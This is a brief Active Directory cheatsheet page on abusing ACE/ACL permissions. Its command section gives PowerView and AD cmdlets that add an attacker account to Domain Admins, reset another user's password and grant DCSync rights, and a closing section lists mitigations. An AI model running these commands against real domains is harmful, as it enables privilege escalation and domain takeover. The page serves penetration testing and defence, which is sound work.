Ace Acl
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
ACE/ACL attacks target Active Directory access control entries and lists. Common abuse targets include GenericAll, GenericWrite, WriteOwner, WriteDACL, ForceChangePassword, and AllExtendedRights on AD objects.
These permissions can allow attackers to modify AD objects, reset passwords, add group memberships, or perform DCSync-style attacks.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Ace Acl:
Get-ObjectAcl -Identity "Domain Admins" | ? {$_.ActiveDirectoryRights -match "GenericAll|Write|Create"}Get-ObjectAcl -Identity "Domain Admins" -ResolveGUIDsAdd-ADGroupMember -Identity "Domain Admins" -Members attackeruserSet-DomainUserPassword -Identity targetuser -AccountPassword (ConvertTo-SecureString "NewPass123!" -AsPlainText -Force)Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity attacker -Rights DCSyncTools & Techniques
Recommended tools for Ace Acl:
- PowerView: Get-ObjectAcl for ACL enumeration
- BloodHound: visual attack path identification
- ADACLScanner: automated ACL auditing
- Add-DomainGroupMember: abuse GenericWrite/GenericAll
- Set-DomainUserPassword: abuse ForceChangePassword
Prevention & Mitigation
Security recommendations to prevent Ace Acl:
- Regularly audit AD ACLs and remove excessive permissions
- Apply the principle of least privilege for delegated controls
- Use groups for permission assignment instead of individual users
- Protect Tier 0 objects (Domain Admins, Enterprise Admins) with strict ACLs
- Monitor for ACL modification events (Event ID 5136)
References
Additional resources: